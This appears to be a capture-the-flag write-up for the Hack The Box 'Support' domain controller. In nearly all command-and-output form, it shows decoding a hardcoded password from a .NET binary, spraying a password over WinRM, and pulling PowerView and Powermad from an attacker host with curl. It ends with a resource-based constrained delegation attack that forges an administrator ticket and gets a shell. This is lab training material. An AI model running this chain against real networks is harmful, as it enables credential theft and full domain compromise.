# NMAP

```
Nmap scan report for 10.129.227.255
Host is up (0.12s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49664/tcp open  unknown
49668/tcp open  unknown
49670/tcp open  unknown
49674/tcp open  unknown
49699/tcp open  unknown
```

# SMB Enum

```
┌──(root㉿kali)-[~/htb/Box/Windows/Support]
└─# smbclient -L 10.129.227.255      
Password for [WORKGROUP\root]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        support-tools   Disk      support staff tools
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.227.255 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```

```
┌──(root㉿kali)-[~/htb/Box/Windows/Support]
└─# smbclient //10.129.227.255/support-tools
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jul 20 13:01:06 2022
  ..                                  D        0  Sat May 28 07:18:25 2022
  7-ZipPortable_21.07.paf.exe         A  2880728  Sat May 28 07:19:19 2022
  npp.8.4.1.portable.x64.zip          A  5439245  Sat May 28 07:19:55 2022
  putty.exe                           A  1273576  Sat May 28 07:20:06 2022
  SysinternalsSuite.zip               A 48102161  Sat May 28 07:19:31 2022
  UserInfo.exe.zip                    A   277499  Wed Jul 20 13:01:07 2022
  windirstat1_1_2_setup.exe           A    79171  Sat May 28 07:20:17 2022
  WiresharkPortable64_3.6.5.paf.exe      A 44398000  Sat May 28 07:19:43 2022

                4026367 blocks of size 4096. 872508 blocks available
smb: \>
```

# Reversing UserInfo.exe

##### UserInfo.Services -> Protected
```c#
using System;
using System.Text;

namespace UserInfo.Services
{
	// Token: 0x02000006 RID: 6
	internal class Protected
	{
		// Token: 0x0600000F RID: 15 RVA: 0x00002118 File Offset: 0x00000318
		public static string getPassword()
		{
			byte[] array = Convert.FromBase64String(Protected.enc_password);
			byte[] array2 = array;
			for (int i = 0; i < array.Length; i++)
			{
				array2[i] = (array[i] ^ Protected.key[i % Protected.key.Length] ^ 223);
			}
			return Encoding.Default.GetString(array2);
		}

		// Token: 0x04000005 RID: 5
		private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";

		// Token: 0x04000006 RID: 6
		private static byte[] key = Encoding.ASCII.GetBytes("armando");
	}
}
```

# Execute Program

```c#
using System;
using System.Text;
					
public class Program
{
	public static void Main()
	{
		string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";
		byte[] key = Encoding.ASCII.GetBytes("armando");
		
		byte[] array = Convert.FromBase64String(enc_password);
		byte[] array2 = array;
		
		for (int i = 0; i < array.Length; i++)
		{
			array2[i] = (byte)(array[i] ^ key[i % key.Length] ^ 223);
		}
		
		Console.WriteLine(Encoding.Default.GetString(array2));
	}
}
```

```
nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
```

# Access ldap

`ldapsearch -H ldap://10.129.227.255 -D support\\ldap -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'CN=Users,DC=support,DC=htb'`

```
# support, Users, support.htb
dn: CN=support,CN=Users,DC=support,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: support
c: US
l: Chapel Hill
st: NC
postalCode: 27514
distinguishedName: CN=support,CN=Users,DC=support,DC=htb
instanceType: 4
whenCreated: 20220528111200.0Z
whenChanged: 20220528111201.0Z
uSNCreated: 12617
info: Ironside47pleasure40Watchful
```

```
Ironside47pleasure40Watchful
```

# Get users

```
┌──(root㉿kali)-[~/htb/Box/Windows/Support]
└─# ldapsearch -H ldap://10.129.227.255 -D support\\ldap -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'CN=Users,DC=support,DC=htb' cn | grep cn | cut -d ':' -f 2 | tr -d ' ' > users.txt
```

# Password Spray winrm

```
┌──(root㉿kali)-[~/htb/Box/Windows/Support]
└─# crackmapexec winrm 10.129.227.255 -u users.txt -p 'Ironside47pleasure40Watchful'
...
...
...
WINRM       10.129.227.255  5985   DC               [-] support.htb\SharedSupportAccounts:Ironside47pleasure40Watchful
WINRM       10.129.227.255  5985   DC               [-] support.htb\ldap:Ironside47pleasure40Watchful
WINRM       10.129.227.255  5985   DC               [+] support.htb\support:Ironside47pleasure40Watchful (Pwn3d!)
```

# Login winrm

```
┌──(root㉿kali)-[~/…/Box/Windows/Support/user]
└─# evil-winrm -i 10.129.227.255 -u support -p 'Ironside47pleasure40Watchful'        

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\support\Documents> type ..\desktop\user.txt
b6453e002706215476fbc20def0a781f
*Evil-WinRM* PS C:\Users\support\Documents>
```

# Bloodhound

```
┌──(root㉿kali)-[~/htb/Box/Windows/Support]
└─# python3 /opt/BloodHound.py/bloodhound.py -u support -p 'Ironside47pleasure40Watchful' -c ALL -d support.htb --dns-tcp -ns 10.129.227.255
INFO: Found AD domain: support.htb
INFO: Connecting to LDAP server: dc.support.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc.support.htb
INFO: Found 21 users
INFO: Found 53 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: Management.support.htb
INFO: Querying computer: dc.support.htb
INFO: Done in 00M 23S
```

```
The members of the group SHARED SUPPORT ACCOUNTS@SUPPORT.HTB have GenericAll privileges to the computer DC.SUPPORT.HTB. \
This is also known as full control. This privilege allows the trustee to manipulate the target object however they wish.
```

# Priv Esc Generic All

```
*Evil-WinRM* PS C:\Users\support\Documents> curl http://10.10.14.19/PowerView.ps1 -o PowerView.ps1
*Evil-WinRM* PS C:\Users\support\Documents> curl http://10.10.14.19/Powermad.ps1 -o Powermad.ps1
```

```
*Evil-WinRM* PS C:\Users\support\Documents> Import-Module ./PowerView.ps1
*Evil-WinRM* PS C:\Users\support\Documents> Import-Module ./Powermad.ps1
```

```
*Evil-WinRM* PS C:\Users\support\Documents> New-MachineAccount -MachineAccount doom -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force)
[+] Machine account doom added
*Evil-WinRM* PS C:\Users\support\Documents> $ComputerSid = Get-DomainComputer doom -Properties objectsid | Select -Expand objectsid
*Evil-WinRM* PS C:\Users\support\Documents> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"                                                                                                                 
*Evil-WinRM* PS C:\Users\support\Documents> $SDBytes = New-Object byte[] ($SD.BinaryLength)                                                      
*Evil-WinRM* PS C:\Users\support\Documents> $SD.GetBinaryForm($SDBytes, 0)                                                                       
*Evil-WinRM* PS C:\Users\support\Documents> Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
```

```
┌──(root㉿kali)-[~/htb/Box/Windows/Support]
└─# python3 /opt/impacket/examples/getST.py support.htb/doom:123456 -dc-ip 10.129.227.255 -impersonate administrator -spn www/dc.support.htb
Impacket v0.10.1.dev1+20220606.123812.ac35841f - Copyright 2022 SecureAuth Corporation

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*]     Requesting S4U2self
[*]     Requesting S4U2Proxy
[*] Saving ticket in administrator.ccache
```

```
┌──(root㉿kali)-[~/htb/Box/Windows/Support]
└─# export KRB5CCNAME=administrator.ccache
```

```
┌──(root㉿kali)-[~/htb/Box/Windows/Support]
└─# impacket-wmiexec support.htb/administrator@dc.support.htb -no-pass -k
Impacket v0.10.1.dev1+20220606.123812.ac35841f - Copyright 2022 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>type c:\users\administrator\desktop\root.txt
b48ec9856c061d9ffa140020f2daf5fe

C:\>
```

# References
https://dotnetfiddle.net/ \
https://github.com/dnSpy/dnSpy \
https://github.com/Kevin-Robertson/Powermad \ 
https://github.com/PowerShellMafia/PowerSploit